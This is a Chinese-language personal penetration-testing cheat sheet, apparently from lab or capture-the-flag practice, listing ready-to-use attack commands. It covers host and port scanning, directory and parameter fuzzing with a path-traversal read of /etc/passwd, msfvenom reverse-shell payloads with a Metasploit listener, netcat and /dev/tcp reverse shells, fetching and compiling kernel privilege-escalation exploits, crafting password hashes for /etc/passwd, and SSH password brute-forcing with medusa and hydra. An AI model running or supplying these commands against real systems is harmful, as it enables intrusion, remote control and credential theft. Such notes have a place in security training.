渗透工具及其知识库(个人笔记)

1.IP搜寻

查看kali网段: ip addr 、 ifconfig

namp:nmap -sP xxx.xxx.xxx.0/24

netdiscover:netdiscover xxx.xxx.xxx.0/24

arp:arp-scan -l

2.端口扫描

粗略扫描:nmap <IP>

深度扫描:

nmap -A -p- <IP>

nmap -T4 -A -v <IP>

3.指纹探测

whatweb <url>

cmseek -u <url>

4.目录扫描

gobuster

gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b '403,404'

dirb

dirb <url>

dirb <url> -x .php,.zip,.txt,.html 等

5.参数探测

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZ=index.php

wfuzz -c -u http://192.168.110.131/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt -H "Cookie:PHPSESSID=l5r7estpbj5rrcfapfdhun8v6p"

6.msf木马文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.232.152 LPORT=7777 -o mshell.php

修改上述的php,生成不同的文件马

生成java jsp木马:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > breach.war

木马使用

复制代码
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 4444
run

linux

/etc/passwd:存放相关用户信息

/etc/knock.conf:ssh保护机制knock的配置文件

/etc/*-release:查看操作系统

sudo -l

查看可以以root权限执行的文件和命令

查看内核

uname -a、uname -rms、hostnamectl

find

find / -name "xxx" 2>/dev/null

su

su user

ls -a

查看所有文件及其相关权限

ssh

ssh user@ip

md5加密

复制代码
md5加密
echo -n "ippsec" | md5sum
转为十六进制
echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 |tr -d ' ' |tr -d '\n'
 
| od -An -t x1:管道 (|) 将 echo 输出的内容传递给 od(octal dump)命令。-An 参数表示不打印地址,-t x1 表示以十六进制形式输出每个字节。
| tr -d ' ':tr(translate)命令用于删除指定字符,这里的 -d ' ' 表示删除所有空格。
| tr -d '\n':再次使用 tr 命令删除所有的换行符(\n)。

openssl解密/加密

复制代码
echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}

key:密钥的十六进制转码

/etc/passwd的用户密码(admin)编译

openssl passwd -1 -salt admin admin

-1 #使用md5加密算法

-salt #自动锚入一个随机参数作为文件内容加密

kali批量处理指令

for i in (cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' \| openssl enc -d -a -i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $i;done

python交互性shell

python -c 'import pty;pty.spawn("/bin/bash")'

反弹shell

nc -e /bin/bash 192.168.110.129 5555

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1

exp查询

内核提权:searchsploit privilege | grep CentOS (管理系统)

searchexploit xxx

search xxx

内核提权.1

拿到了xxx.c

gcc编译并另存:gcc xxx.c -o yf

(未'shell'之前)msf upload:upload ~/yf ./yf

赋权:chmod +x yf

执行:./yf

内核提权.2

找到xxx.c

放在网站目录:cp xxx.c /var/www/html

kali开启apache服务:service apache2 start

wget下载:wget http:<kali ip>/xxx.c

赋权:chmod 777 xxx.c

gcc编译:gcc xxx.c -o xxx

执行:./xxx

./keystore结合pcap(.p12)文件

复制代码
keytool -importkeystore -srckeystore <keystore的文件名> -destkeystore 文件名.p12 -deststoretype pkcs12 -srcalias tomcat

string

strings bill.png

knock敲门

knock 192.168.110.131 7469 8475 9842

端口监听

nc -lvp 5555

ssh密码爆破

medusa

medusa -M ssh -h 192.168.0.131 -u flag4 -P /usr/share/john/password.lst -e ns -F

hydra

echo 'flag4'>admin.txt
hydra -L admin.txt -P /usr/share/john/password.lst 192.168.0.131 ssh

相关推荐
FakeOccupational11 分钟前
电路笔记(信号):网线能传多少米?网线信号传输距离
开发语言·笔记·php
Yawesh_best10 小时前
告别系统壁垒!WSL+cpolar 让跨平台开发效率翻倍
运维·服务器·数据库·笔记·web安全
Ccjf酷儿12 小时前
操作系统 蒋炎岩 3.硬件视角的操作系统
笔记
习习.y12 小时前
python笔记梳理以及一些题目整理
开发语言·笔记·python
在逃热干面13 小时前
(笔记)自定义 systemd 服务
笔记
DKPT14 小时前
ZGC和G1收集器相比哪个更好?
java·jvm·笔记·学习·spring
QT 小鲜肉15 小时前
【孙子兵法之上篇】001. 孙子兵法·计篇
笔记·读书·孙子兵法
星轨初途16 小时前
数据结构排序算法详解(5)——非比较函数:计数排序(鸽巢原理)及排序算法复杂度和稳定性分析
c语言·开发语言·数据结构·经验分享·笔记·算法·排序算法
QT 小鲜肉17 小时前
【孙子兵法之上篇】001. 孙子兵法·计篇深度解析与现代应用
笔记·读书·孙子兵法
love530love19 小时前
【笔记】ComfUI RIFEInterpolation 节点缺失问题(cupy CUDA 安装)解决方案
人工智能·windows·笔记·python·插件·comfyui